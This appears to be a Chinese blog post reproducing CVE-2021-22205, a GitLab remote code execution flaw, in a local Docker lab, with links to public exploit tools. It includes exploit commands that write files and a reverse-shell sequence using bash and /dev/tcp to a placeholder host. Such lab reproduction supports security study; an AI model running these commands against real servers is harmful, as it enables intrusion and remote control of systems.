CVE-2021-22205复现
影响版本:RCE exploit for gitlab version < 13.10.3git工具:GitHub - mr-r3bot/Gitlab-CVE-2021-22205https://github.com/projectdiscovery/nucleihttps://github.com/projectdiscovery/nuclei-templatespython3 explo
·
影响版本:
RCE exploit for gitlab version < 13.10.3
git工具:
推荐使用第一个
https://github.com/Al1ex/CVE-2021-22205
GitHub - mr-r3bot/Gitlab-CVE-2021-22205
https://github.com/projectdiscovery/nuclei
https://github.com/projectdiscovery/nuclei-templates
环境搭建:
export GITLAB_HOME=/Users/XXX/Desktop/software/CVE/CVE-2021-22205
docker run --detach \
--hostname gitlab.example.com \
--publish 443:443 --publish 80:80 \
--name gitlab \
--restart always \
--volume $GITLAB_HOME/config:/etc/gitlab \
--volume $GITLAB_HOME/logs:/var/log/gitlab \
--volume $GITLAB_HOME/data:/var/opt/gitlab \
gitlab/gitlab-ce:13.9.1-ce.0
建议内存开大,直接访问本地端口
验证
写文件:
python3 CVE-2021-22205.py -a true -t http://localhost:8089/ -c "echo 'Attacked by Al1exp' > /tmp/1.txt"
反弹shell
python3 CVE-2021-22205.py -a true -t http://127.0.0.1:8089 -c "echo 'bash -i >& /dev/tcp/xxxxxxxx/8080 0>&1' > /tmp/1.sh"
python3 CVE-2021-22205.py -a true -t http://127.0.0.1:8089 -c "chmod +x /tmp/1.sh"
python3 CVE-2021-22205.py -a true -t http://127.0.0.1:8089 -c "/bin/bash /tmp/1.sh"
开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!
更多推荐
已为社区贡献2条内容
所有评论(0)